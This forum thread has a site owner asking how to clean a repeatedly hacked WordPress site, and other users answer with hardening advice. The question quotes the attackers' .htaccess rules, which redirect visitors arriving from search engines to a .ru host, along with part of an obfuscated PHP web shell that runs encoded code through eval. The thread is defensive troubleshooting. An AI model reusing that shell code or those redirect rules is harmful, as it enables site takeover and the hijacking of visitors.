Mobile app version of vmapp.org
Login or Join
Goswami781

: Clean an attacked website Since few monts a client website is attacked by bots. I've changed the website source (now wordpress last version), try to clean but bot find hole in sécurity ...

@Goswami781

Posted in: #Botattack

Since few monts a client website is attacked by bots. I've changed the website source (now wordpress last version), try to clean but bot find hole in sécurity ...

After bot action i can find .htaccess files on the website with this inside:

ErrorDocument 400 **********.ru/upday/index.php ErrorDocument 401 **********.ru/upday/index.php
[...]

RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|
altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|
metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|
rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch
|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search
|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick
|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey
|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro
|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase
|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv).(.*)

RewriteRule ^(.*)$ *******.ru/upday/index.php [R=301,L]

[...]


I can find in my log files the used file for add .htaccess:

77.84.28.xxx domain.tdl - [23/Feb/2012:00:00:00 +0100] "POST /fichiers/cookiemw5.php
HTTP/1.1" 200 34 "-" "-"


With this code inside:

<?php $auth_pass="";$color="#df5";$default_action="FilesMan";$default_use_ajax=true;
$default_charset="Windows-1251";preg_replace("/.*/e","x65x76x61x6Cx28x67x7A
x69x6Ex66x6Cx61x74x65x28x62x61x73x65x36x34x5Fx64x65x63x6Fx64
x65x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4Ck
REqy43S738N1vbufp7FIEARJkARBAHT7xRVnNIlui4XO6d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHC
tPQCbYHzjgKWYtZQWDdFo3Xvj/wHKPMjFNvGkzwx/vTo1d+hL9cq2MF9tC9dgL8/GKNe84N/jqxRl0PEk
tN5vaLk8AZdEZWZA+L5prJKswdTTy/5xTNv82yWm0J8sw1FxMfoHXoWD0nKFLuWq1SZc+qz9iRH7F9fzru
mVCvc+NGTXYP/9tyx24ndKKi6QSBH3Q8f2CWj84PDwEqyYPUDuWHZrmq5Yysm45z49jTyPXHncgdOQICcu
mz47kjNyrGaSNr4NqdP6d+5ISdYDpGGJ7bc/ruGNr96fS4A607PTg+gsaa9cpzk3fVIF18MLGL1OL+dGwj
AQzKhlHgTkLPCodOWCzQSCFI4 [...]


I delete .php files, .htaccess files, but they appears after hours or minutes ...
Whats is the proceed to find the hole / stop the bot attack ?

(it's on shared hosting (ovh.com)

10.02% popularity Vote Up Vote Down


Login to follow query

More posts by @Goswami781

2 Comments

Sorted by latest first Latest Oldest Best

 

@Turnbaugh106

Basic Security Steps


Since Wordpress is so popular there are a lot of drive by hacks knocking around taking advantage of flaws in basic security. All Wordpress users should take the following basic and easy steps to protect themselves:-


Do not use wp_ as the database table prefix, use any string of random characters that appeals.
Turn off Wordpress DB errors.
Make sure your directory's are set to chmod 755 and files 644.
Use a secure password generator (use at least 15 characters).
Do not use admin as a username.
Place a blank .htaccess file in the wp-admin directory.
Read Wordpress hardening
Check the Google Cache of your site for hidden malware.
Remove <meta name="generator" content="WordPress X.X.X" /> from your site's header by placing remove_action('wp_head', 'wp_generator'); in your functions.php file (drive by attackers will not have an easy way to find which version they are targeting).



TimThumb Hack


There also is a very popular drive by hack associated with an old version of the popular tim thumb script, which causes a lot of problems for webmasters. Check your uploads directory for php files and ensure you've upgraded to the latest version of the script to avoid this.


Advice


I run about 10 different Wordpresses and have found the WP-Security plugin and account from website defender invaluable, it scans your site regularly and reports on security errors, malware, and even page errors via email so you can be assured that you know when something goes wrong.

WP-Firewall is also very useful for defense against 0-Day exploits and VirusTotal is handy if you suspect an infection.

Akismet and Disqus.com are useful tools for defending against comment spam, and you should read the webmaster pros community wiki on this subject.


Webmaster Tools


You should also sign up to webmaster tools, but if you suspect an infection, take all steps to find and clean it up first or you may end up with Google warning your users that yours is a reported attack site.

If it detects an infection Google will send an email to all of the following addresses abuse@, admin@, administrator@, contact@, info@, postmaster@, support@, webmaster@ so you should ensure that you have at least one of these in place and monitored.


Paid Removal Services / Where To Get Help


There are also a number of sites which offer paid malware removal services, I would be very suspicious of these - many appear to be scams of one sort or another.

There is plenty of high quality help and support available for free in the wordpress forums, here on webmaster pro's, the wordpress stackexchange site and on stackoverflow. Don't pay for things you can fix on your own.

10% popularity Vote Up Vote Down


 

@Kevin317

You need to completely remove every file from your website and do a fresh install of Wordpress. The odds are they uploaded files that allow them continuous access to your site. Unless you want to go file by file trying to figure out which one(s) they are a complete install from scratch is the best thing you can do.

10% popularity Vote Up Vote Down


Back to top | Use Dark Theme